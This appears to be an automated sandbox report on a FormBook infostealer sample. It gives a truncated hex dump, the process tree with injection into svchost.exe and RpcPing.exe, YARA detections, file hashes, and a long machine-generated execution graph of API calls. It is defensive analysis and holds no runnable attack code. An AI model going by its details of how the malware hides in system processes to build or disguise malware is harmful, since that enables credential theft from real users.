                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0



                  Target ID:0
                  Start time:07:52:01
                  Start date:02/07/2024
                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
                  Imagebase:0x750000
                  File size:1'208'832 bytes
                  MD5 hash:A6D5020BF8BFE2DC1140A50936EF5EC9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:07:52:02
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
                  Imagebase:0xa30000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  Target ID:8
                  Start time:07:52:51
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe"
                  Imagebase:0x1e0000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:9
                  Start time:07:52:52
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\RpcPing.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                  Imagebase:0x2d0000
                  File size:26'624 bytes
                  MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  Target ID:10
                  Start time:07:53:19
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe"
                  Imagebase:0x1e0000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:11
                  Start time:07:53:34
                  Start date:02/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff728280000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:2.9%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:166
98498->98500 98499->98498 98500->98370 98502 7573f2 __write_nolock 98501->98502 98503 78ee4b _memset 98502->98503 98504 75740b 98502->98504 98507 78ee67 GetOpenFileNameW 98503->98507 99538 7548ae 98504->99538 98509 78eeb6 98507->98509 98510 757d2c 59 API calls 98509->98510 98512 78eecb 98510->98512 98512->98512 98514 757429 99566 7569ca 98514->99566 98518 760a9a __write_nolock 98517->98518 99882 756ee0 98518->99882 98520 760a9f 98532 753c26 98520->98532 99893 7612fe 89 API calls 98520->99893 98522 760aac 98522->98532 99894 764047 91 API calls Mailbox 98522->99894 98524 760ab5 98525 760ab9 GetFullPathNameW 98524->98525 98524->98532 98526 757d2c 59 API calls 98525->98526 98527 760ae5 98526->98527 98528 757d2c 59 API calls 98527->98528 98529 760af2 98528->98529 98530 7950d5 _wcscat 98529->98530 98531 757d2c 59 API calls 98529->98531 98531->98532 98532->98379 98532->98387 98534 78d49c 98533->98534 98535 753ac2 LoadImageW RegisterClassExW 98533->98535 99934 7548fe LoadImageW EnumResourceNamesW 98534->99934 99933 753041 7 API calls 98535->99933 98538 78d4a5 98539 753b46 98540 7539e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98539->98540 98540->98395 98542 754406 _memset 98541->98542 99935 754213 98542->99935 98548 75448b 98553 7950ed 98552->98553 98565 760b55 98552->98565 100024 7ba0b5 89 API calls 4 library calls 98553->100024 98561 760bab PeekMessageW 98592 760b65 Mailbox 98561->98592 98565->98592 100025 759fbd 60 API calls 98565->100025 100026 7a68bf 341 API calls 98565->100026 98566 7952ab Sleep 98566->98592 98571 760fa3 PeekMessageW 98571->98592 98572 760fbf TranslateMessage DispatchMessageW 98572->98571 98573 79517a TranslateAcceleratorW 98573->98571 98573->98592 98574 795c49 WaitForSingleObject 98574->98592 98576 760e73 timeGetTime 98576->98592 98577 760fdd Sleep 98578 7581a7 59 API calls 98578->98592 98592->98561 98592->98566 98592->98571 98592->98572 98592->98573 98592->98574 98592->98576 98592->98577 98592->98578 98624 7959ff VariantClear 
98592->98624 98625 795a95 VariantClear 98592->98625 98626 758e34 59 API calls Mailbox 98592->98626 98627 795843 VariantClear 98592->98627 98628 7a7405 59 API calls 98592->98628 98624->98592 98625->98592 98626->98592 98627->98592 98628->98592 98630->98379 98631->98392 98633 781b90 __write_nolock 98632->98633 98634 754871 GetModuleFileNameW 98633->98634 98635 757f41 59 API calls 98634->98635 98636 754897 98635->98636 98637 7548ae 60 API calls 98636->98637 98638 7548a1 Mailbox 98637->98638 98638->98398 98660 753d50 __write_nolock 98659->98660 98661 757d2c 59 API calls 98660->98661 98671 753eb6 Mailbox 98660->98671 98663 753d82 98661->98663 98666 753db8 Mailbox 98663->98666 98785 757b52 98663->98785 98664 757b52 59 API calls 98664->98666 98665 753e89 98667 757f41 59 API calls 98665->98667 98665->98671 98666->98664 98666->98665 98668 757f41 59 API calls 98666->98668 98666->98671 98788 753f84 98666->98788 98669 753eaa 98667->98669 98668->98666 98670 753f84 59 API calls 98669->98670 98670->98671 98671->98424 98794 754d13 98673->98794 98678 78dd0f 98680 754faa 84 API calls 98678->98680 98679 754f68 LoadLibraryExW 98804 754cc8 98679->98804 98683 78dd16 98680->98683 98685 754cc8 3 API calls 98683->98685 98687 78dd1e 98685->98687 98686 754f8f 98686->98687 98688 754f9b 98686->98688 98830 75506b 98687->98830 98689 754faa 84 API calls 98688->98689 98691 7537e6 98689->98691 98691->98431 98691->98432 98694 78dd45 98838 755027 98694->98838 98696 78dd52 98698 7581b2 98697->98698 98699 753801 98697->98699 99268 7580d7 98698->99268 98701 7593ea 98699->98701 98702 770ff6 Mailbox 59 API calls 98701->98702 98703 75380d 98702->98703 98703->98445 98705 75862b 98704->98705 98707 758652 98705->98707 99272 758b13 69 API calls Mailbox 98705->99272 98707->98449 98709 753f05 98708->98709 98710 753eec 98708->98710 98712 757d2c 59 API calls 98709->98712 98711 7581a7 59 API calls 98710->98711 98713 75388b 98711->98713 98712->98713 98714 77313d 98713->98714 98715 7731be 98714->98715 98716 773149 
98714->98716 99275 7731d0 60 API calls 3 library calls 98715->99275 98723 77316e 98716->98723 99273 778d68 58 API calls __getptd_noexit 98716->99273 98719 7731cb 98719->98470 98720 773155 99274 778ff6 9 API calls _memcpy_s 98720->99274 98722 773160 98722->98470 98723->98470 98725 759436 98724->98725 98726 770ff6 Mailbox 59 API calls 98725->98726 98727 759444 98726->98727 98728 753936 98727->98728 99276 75935c 59 API calls Mailbox 98727->99276 98730 7591b0 98728->98730 99277 7592c0 98730->99277 98732 770ff6 Mailbox 59 API calls 98733 753944 98732->98733 98735 759040 98733->98735 98734 7591bf 98734->98732 98734->98733 98736 78f5a5 98735->98736 98738 759057 98735->98738 98736->98738 99287 758d3b 59 API calls Mailbox 98736->99287 98739 7591a0 98738->98739 98740 759158 98738->98740 98743 75915f 98738->98743 99286 759e9c 60 API calls Mailbox 98739->99286 98742 770ff6 Mailbox 59 API calls 98740->98742 98742->98743 98743->98498 98745 755045 85 API calls 98744->98745 98746 7b9854 98745->98746 99288 7b99be 98746->99288 98749 75506b 74 API calls 98750 7b9881 98749->98750 98751 75506b 74 API calls 98750->98751 98752 7b9891 98751->98752 98753 75506b 74 API calls 98752->98753 98754 7b98ac 98753->98754 98755 75506b 74 API calls 98754->98755 98756 7b98c7 98755->98756 98757 755045 85 API calls 98756->98757 98758 7b98de 98757->98758 98759 77594c __crtCompareStringA_stat 58 API calls 98758->98759 98760 7b98e5 98759->98760 98761 77594c __crtCompareStringA_stat 58 API calls 98760->98761 98762 7b98ef 98761->98762 98763 75506b 74 API calls 98762->98763 98764 7b9903 98763->98764 98765 7b9393 GetSystemTimeAsFileTime 98764->98765 98766 7b9916 98765->98766 98767 7b992b 98766->98767 98768 7b9940 98766->98768 98769 772f95 _free 58 API calls 98767->98769 98770 7b9946 98768->98770 98771 7b99a5 98768->98771 98773 7b9931 98769->98773 99294 7b8d90 98770->99294 98772 772f95 _free 58 API calls 98771->98772 98778 78d3c1 98772->98778 98776 772f95 _free 58 API calls 98773->98776 98776->98778 98777 
772f95 _free 58 API calls 98777->98778 98778->98435 98779 754faa 98778->98779 98780 754fb4 98779->98780 98781 754fbb 98779->98781 98782 7755d6 __fcloseall 83 API calls 98780->98782 98783 754fdb FreeLibrary 98781->98783 98784 754fca 98781->98784 98782->98781 98783->98784 98784->98435 98786 757faf 59 API calls 98785->98786 98787 757b5d 98786->98787 98787->98663 98789 753f92 98788->98789 98793 753fb4 _memmove 98788->98793 98792 770ff6 Mailbox 59 API calls 98789->98792 98790 770ff6 Mailbox 59 API calls 98791 753fc8 98790->98791 98791->98666 98792->98793 98793->98790 98843 754d61 98794->98843 98797 754d53 98801 77548b 98797->98801 98798 754d4a FreeLibrary 98798->98797 98799 754d61 2 API calls 98800 754d3a 98799->98800 98800->98797 98800->98798 98847 7754a0 98801->98847 98803 754f5c 98803->98678 98803->98679 99005 754d94 98804->99005 98807 754ced 98808 754cff FreeLibrary 98807->98808 98809 754d08 98807->98809 98808->98809 98811 754dd0 98809->98811 98810 754d94 2 API calls 98810->98807 98812 770ff6 Mailbox 59 API calls 98811->98812 98813 754de5 98812->98813 99009 75538e 98813->99009 98815 754df1 _memmove 98816 754e2c 98815->98816 98818 754f21 98815->98818 98819 754ee9 98815->98819 98817 755027 69 API calls 98816->98817 98823 754e35 98817->98823 99023 7b9ba5 95 API calls 98818->99023 99012 754fe9 CreateStreamOnHGlobal 98819->99012 98822 75506b 74 API calls 98822->98823 98823->98822 98825 754ec9 98823->98825 98826 78dcd0 98823->98826 99018 755045 98823->99018 98825->98686 98827 755045 85 API calls 98826->98827 98828 78dce4 98827->98828 98829 75506b 74 API calls 98828->98829 98829->98825 98831 75507d 98830->98831 98832 78ddf6 98830->98832 99047 775812 98831->99047 98835 7b9393 99245 7b91e9 98835->99245 98837 7b93a9 98837->98694 98839 78ddb9 98838->98839 98840 755036 98838->98840 99250 775e90 98840->99250 98842 75503e 98842->98696 98844 754d2e 98843->98844 98845 754d6a LoadLibraryA 98843->98845 98844->98799 98844->98800 98845->98844 98846 754d7b GetProcAddress 98845->98846 
98846->98844 98848 7754ac __ioinit 98847->98848 98849 7754bf 98848->98849 98851 7754f0 98848->98851 98896 778d68 58 API calls __getptd_noexit 98849->98896 98866 780738 98851->98866 98852 7754c4 98897 778ff6 9 API calls _memcpy_s 98852->98897 98855 7754f5 98856 7754fe 98855->98856 98857 77550b 98855->98857 98898 778d68 58 API calls __getptd_noexit 98856->98898 98859 775535 98857->98859 98860 775515 98857->98860 98881 780857 98859->98881 98899 778d68 58 API calls __getptd_noexit 98860->98899 98861 7754cf __ioinit @_EH4_CallFilterFunc@8 98861->98803 98867 780744 __ioinit 98866->98867 98868 779e4b __lock 58 API calls 98867->98868 98879 780752 98868->98879 98869 7807cd 98906 778a5d 58 API calls 2 library calls 98869->98906 98870 7807c6 98901 78084e 98870->98901 98873 7807d4 98873->98870 98907 77a06b InitializeCriticalSectionAndSpinCount 98873->98907 98874 780843 __ioinit 98874->98855 98876 779ed3 __mtinitlocknum 58 API calls 98876->98879 98878 7807fa EnterCriticalSection 98878->98870 98879->98869 98879->98870 98879->98876 98904 776e8d 59 API calls __lock 98879->98904 98905 776ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98879->98905 98890 780877 __wopenfile 98881->98890 98882 780891 98912 778d68 58 API calls __getptd_noexit 98882->98912 98883 780a4c 98883->98882 98887 780aaf 98883->98887 98885 780896 98913 778ff6 9 API calls _memcpy_s 98885->98913 98909 7887f1 98887->98909 98888 775540 98900 775562 LeaveCriticalSection LeaveCriticalSection _fprintf 98888->98900 98890->98882 98890->98883 98914 773a0b 60 API calls 2 library calls 98890->98914 98892 780a45 98892->98883 98915 773a0b 60 API calls 2 library calls 98892->98915 98894 780a64 98894->98883 98916 773a0b 60 API calls 2 library calls 98894->98916 98896->98852 98897->98861 98898->98861 98899->98861 98900->98861 98908 779fb5 LeaveCriticalSection 98901->98908 98903 780855 98903->98874 98904->98879 98905->98879 98906->98873 98907->98878 98908->98903 98917 787fd5 98909->98917 98911 78880a 98911->98888 
98912->98885 98913->98888 98914->98892 98915->98894 98916->98883 98920 787fe1 __ioinit 98917->98920 98918 787ff7 99002 778d68 58 API calls __getptd_noexit 98918->99002 98920->98918 98922 78802d 98920->98922 98921 787ffc 99003 778ff6 9 API calls _memcpy_s 98921->99003 98928 78809e 98922->98928 98925 788049 99004 788072 LeaveCriticalSection __unlock_fhandle 98925->99004 98927 788006 __ioinit 98927->98911 98929 7880be 98928->98929 98930 77471a __wsopen_nolock 58 API calls 98929->98930 98933 7880da 98930->98933 98931 779006 __invoke_watson 8 API calls 98932 7887f0 98931->98932 98935 787fd5 __wsopen_helper 103 API calls 98932->98935 98934 788114 98933->98934 98941 788137 98933->98941 98977 788211 98933->98977 98937 778d34 __read_nolock 58 API calls 98934->98937 98936 78880a 98935->98936 98936->98925 98938 788119 98937->98938 98939 778d68 _memcpy_s 58 API calls 98938->98939 98940 788126 98939->98940 98943 778ff6 _memcpy_s 9 API calls 98940->98943 98942 7881f5 98941->98942 98949 7881d3 98941->98949 98944 778d34 __read_nolock 58 API calls 98942->98944 98970 788130 98943->98970 98945 7881fa 98944->98945 98946 778d68 _memcpy_s 58 API calls 98945->98946 98947 788207 98946->98947 98948 778ff6 _memcpy_s 9 API calls 98947->98948 98948->98977 98950 77d4d4 __alloc_osfhnd 61 API calls 98949->98950 98951 7882a1 98950->98951 98952 7882ab 98951->98952 98953 7882ce 98951->98953 98955 778d34 __read_nolock 58 API calls 98952->98955 98954 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98953->98954 98964 7882f0 98954->98964 98956 7882b0 98955->98956 98958 778d68 _memcpy_s 58 API calls 98956->98958 98957 78836e GetFileType 98959 788379 GetLastError 98957->98959 98960 7883bb 98957->98960 98962 7882ba 98958->98962 98963 778d47 __dosmaperr 58 API calls 98959->98963 98973 77d76a __set_osfhnd 59 API calls 98960->98973 98961 78833c GetLastError 98965 778d47 __dosmaperr 58 API calls 98961->98965 98966 778d68 _memcpy_s 58 API calls 98962->98966 98967 7883a0 CloseHandle 
98963->98967 98964->98957 98964->98961 98968 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98964->98968 98969 788361 98965->98969 98966->98970 98967->98969 98971 7883ae 98967->98971 98972 788331 98968->98972 98975 778d68 _memcpy_s 58 API calls 98969->98975 98970->98925 98974 778d68 _memcpy_s 58 API calls 98971->98974 98972->98957 98972->98961 98979 7883d9 98973->98979 98976 7883b3 98974->98976 98975->98977 98976->98969 98977->98931 98978 788594 98978->98977 98982 788767 CloseHandle 98978->98982 98979->98978 98980 781b11 __lseeki64_nolock 60 API calls 98979->98980 98997 78845a 98979->98997 98981 788443 98980->98981 98985 778d34 __read_nolock 58 API calls 98981->98985 98981->98997 98983 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98982->98983 98984 78878e 98983->98984 98987 7887c2 98984->98987 98988 788796 GetLastError 98984->98988 98985->98997 98986 7810ab 70 API calls __read_nolock 98986->98997 98987->98977 98989 778d47 __dosmaperr 58 API calls 98988->98989 98990 7887a2 98989->98990 98993 77d67d __free_osfhnd 59 API calls 98990->98993 98991 780d2d __close_nolock 61 API calls 98991->98997 98992 78848c 98994 7899f2 __chsize_nolock 82 API calls 98992->98994 98992->98997 98993->98987 98994->98992 98995 77dac6 __write 78 API calls 98995->98997 98996 788611 98999 780d2d __close_nolock 61 API calls 98996->98999 98997->98978 98997->98986 98997->98991 98997->98992 98997->98995 98997->98996 98998 781b11 60 API calls __lseeki64_nolock 98997->98998 98998->98997 99000 788618 98999->99000 99001 778d68 _memcpy_s 58 API calls 99000->99001 99001->98977 99002->98921 99003->98927 99004->98927 99006 754ce1 99005->99006 99007 754d9d LoadLibraryA 99005->99007 99006->98807 99006->98810 99007->99006 99008 754dae GetProcAddress 99007->99008 99008->99006 99010 770ff6 Mailbox 59 API calls 99009->99010 99011 7553a0 99010->99011 99011->98815 99013 755020 99012->99013 99014 755003 FindResourceExW 99012->99014 99013->98816 99014->99013 99015 78dd5c 
LoadResource 99014->99015 99015->99013 99016 78dd71 SizeofResource 99015->99016 99016->99013 99017 78dd85 LockResource 99016->99017 99017->99013 99019 755054 99018->99019 99020 78ddd4 99018->99020 99024 775a7d 99019->99024 99022 755062 99022->98823 99023->98816 99025 775a89 __ioinit 99024->99025 99026 775a9b 99025->99026 99027 775ac1 99025->99027 99037 778d68 58 API calls __getptd_noexit 99026->99037 99039 776e4e 99027->99039 99030 775aa0 99038 778ff6 9 API calls _memcpy_s 99030->99038 99031 775ac7 99045 7759ee 83 API calls 5 library calls 99031->99045 99034 775aab __ioinit 99034->99022 99035 775ad6 99046 775af8 LeaveCriticalSection LeaveCriticalSection _fprintf 99035->99046 99037->99030 99038->99034 99040 776e80 EnterCriticalSection 99039->99040 99041 776e5e 99039->99041 99043 776e76 99040->99043 99041->99040 99042 776e66 99041->99042 99044 779e4b __lock 58 API calls 99042->99044 99043->99031 99044->99043 99045->99035 99046->99034 99050 77582d 99047->99050 99049 75508e 99049->98835 99051 775839 __ioinit 99050->99051 99052 775874 __ioinit 99051->99052 99053 77584f _memset 99051->99053 99054 77587c 99051->99054 99052->99049 99077 778d68 58 API calls __getptd_noexit 99053->99077 99055 776e4e __lock_file 59 API calls 99054->99055 99056 775882 99055->99056 99063 77564d 99056->99063 99059 775869 99078 778ff6 9 API calls _memcpy_s 99059->99078 99066 775668 _memset 99063->99066 99070 775683 99063->99070 99064 775673 99175 778d68 58 API calls __getptd_noexit 99064->99175 99066->99064 99068 7756c3 99066->99068 99066->99070 99068->99070 99071 7757d4 _memset 99068->99071 99080 774916 99068->99080 99087 7810ab 99068->99087 99155 780df7 99068->99155 99177 780f18 58 API calls 3 library calls 99068->99177 99079 7758b6 LeaveCriticalSection LeaveCriticalSection _fprintf 99070->99079 99178 778d68 58 API calls __getptd_noexit 99071->99178 99076 775678 99176 778ff6 9 API calls _memcpy_s 99076->99176 99077->99059 99078->99052 99079->99052 99081 774935 99080->99081 99082 774920 
99080->99082 99081->99068 99179 778d68 58 API calls __getptd_noexit 99082->99179 99084 774925 99180 778ff6 9 API calls _memcpy_s 99084->99180 99086 774930 99086->99068 99088 7810cc 99087->99088 99089 7810e3 99087->99089 99190 778d34 58 API calls __getptd_noexit 99088->99190 99091 78181b 99089->99091 99096 78111d 99089->99096 99206 778d34 58 API calls __getptd_noexit 99091->99206 99093 7810d1 99191 778d68 58 API calls __getptd_noexit 99093->99191 99094 781820 99207 778d68 58 API calls __getptd_noexit 99094->99207 99098 781125 99096->99098 99103 78113c 99096->99103 99192 778d34 58 API calls __getptd_noexit 99098->99192 99100 781131 99208 778ff6 9 API calls _memcpy_s 99100->99208 99101 78112a 99193 778d68 58 API calls __getptd_noexit 99101->99193 99104 781151 99103->99104 99107 78116b 99103->99107 99108 781189 99103->99108 99135 7810d8 99103->99135 99194 778d34 58 API calls __getptd_noexit 99104->99194 99107->99104 99110 781176 99107->99110 99195 778a5d 58 API calls 2 library calls 99108->99195 99181 785ebb 99110->99181 99111 781199 99113 7811bc 99111->99113 99114 7811a1 99111->99114 99198 781b11 60 API calls 3 library calls 99113->99198 99196 778d68 58 API calls __getptd_noexit 99114->99196 99115 78128a 99117 781303 ReadFile 99115->99117 99122 7812a0 GetConsoleMode 99115->99122 99120 7817e3 GetLastError 99117->99120 99121 781325 99117->99121 99119 7811a6 99197 778d34 58 API calls __getptd_noexit 99119->99197 99124 7817f0 99120->99124 99125 7812e3 99120->99125 99121->99120 99129 7812f5 99121->99129 99126 781300 99122->99126 99127 7812b4 99122->99127 99204 778d68 58 API calls __getptd_noexit 99124->99204 99140 7812e9 99125->99140 99199 778d47 58 API calls 3 library calls 99125->99199 99126->99117 99127->99126 99130 7812ba ReadConsoleW 99127->99130 99138 78135a 99129->99138 99129->99140 99142 7815c7 99129->99142 99130->99129 99133 7812dd GetLastError 99130->99133 99132 7817f5 99205 778d34 58 API calls __getptd_noexit 99132->99205 99133->99125 99135->99068 99136 772f95 
_free 58 API calls 99136->99135 99139 7813c6 ReadFile 99138->99139 99147 781447 99138->99147 99143 7813e7 GetLastError 99139->99143 99153 7813f1 99139->99153 99140->99135 99140->99136 99141 7816cd ReadFile 99146 7816f0 GetLastError 99141->99146 99154 7816fe 99141->99154 99142->99140 99142->99141 99143->99153 99144 781504 99151 7814b4 MultiByteToWideChar 99144->99151 99202 781b11 60 API calls 3 library calls 99144->99202 99145 7814f4 99201 778d68 58 API calls __getptd_noexit 99145->99201 99146->99154 99147->99140 99147->99144 99147->99145 99147->99151 99151->99133 99151->99140 99153->99138 99200 781b11 60 API calls 3 library calls 99153->99200 99154->99142 99203 781b11 60 API calls 3 library calls 99154->99203 99156 780e02 99155->99156 99161 780e17 99155->99161 99242 778d68 58 API calls __getptd_noexit 99156->99242 99158 780e12 99158->99068 99159 780e07 99243 778ff6 9 API calls _memcpy_s 99159->99243 99161->99158 99162 780e4c 99161->99162 99244 786234 58 API calls __malloc_crt 99161->99244 99164 774916 __fputwc_nolock 58 API calls 99162->99164 99165 780e60 99164->99165 99209 780f97 99165->99209 99167 780e67 99167->99158 99168 774916 __fputwc_nolock 58 API calls 99167->99168 99169 780e8a 99168->99169 99169->99158 99170 774916 __fputwc_nolock 58 API calls 99169->99170 99171 780e96 99170->99171 99171->99158 99172 774916 __fputwc_nolock 58 API calls 99171->99172 99173 780ea3 99172->99173 99174 774916 __fputwc_nolock 58 API calls 99173->99174 99174->99158 99175->99076 99176->99070 99177->99068 99178->99076 99179->99084 99180->99086 99182 785ed3 99181->99182 99183 785ec6 99181->99183 99185 785edf 99182->99185 99186 778d68 _memcpy_s 58 API calls 99182->99186 99184 778d68 _memcpy_s 58 API calls 99183->99184 99187 785ecb 99184->99187 99185->99115 99188 785f00 99186->99188 99187->99115 99189 778ff6 _memcpy_s 9 API calls 99188->99189 99189->99187 99190->99093 99191->99135 99192->99101 99193->99100 99194->99101 99195->99111 99196->99119 99197->99135 99198->99110 99199->99140 
99200->99153 99201->99140 99202->99151 99203->99154 99204->99132 99205->99140 99206->99094 99207->99100 99208->99135 99210 780fa3 __ioinit 99209->99210 99211 780fb0 99210->99211 99212 780fc7 99210->99212 99213 778d34 __read_nolock 58 API calls 99211->99213 99214 78108b 99212->99214 99217 780fdb 99212->99217 99216 780fb5 99213->99216 99215 778d34 __read_nolock 58 API calls 99214->99215 99218 780ffe 99215->99218 99219 778d68 _memcpy_s 58 API calls 99216->99219 99220 780ff9 99217->99220 99221 781006 99217->99221 99227 778d68 _memcpy_s 58 API calls 99218->99227 99234 780fbc __ioinit 99219->99234 99224 778d34 __read_nolock 58 API calls 99220->99224 99222 781028 99221->99222 99223 781013 99221->99223 99226 77d446 ___lock_fhandle 59 API calls 99222->99226 99225 778d34 __read_nolock 58 API calls 99223->99225 99224->99218 99228 781018 99225->99228 99229 78102e 99226->99229 99230 781020 99227->99230 99231 778d68 _memcpy_s 58 API calls 99228->99231 99232 781041 99229->99232 99233 781054 99229->99233 99236 778ff6 _memcpy_s 9 API calls 99230->99236 99231->99230 99235 7810ab __read_nolock 70 API calls 99232->99235 99237 778d68 _memcpy_s 58 API calls 99233->99237 99234->99167 99238 78104d 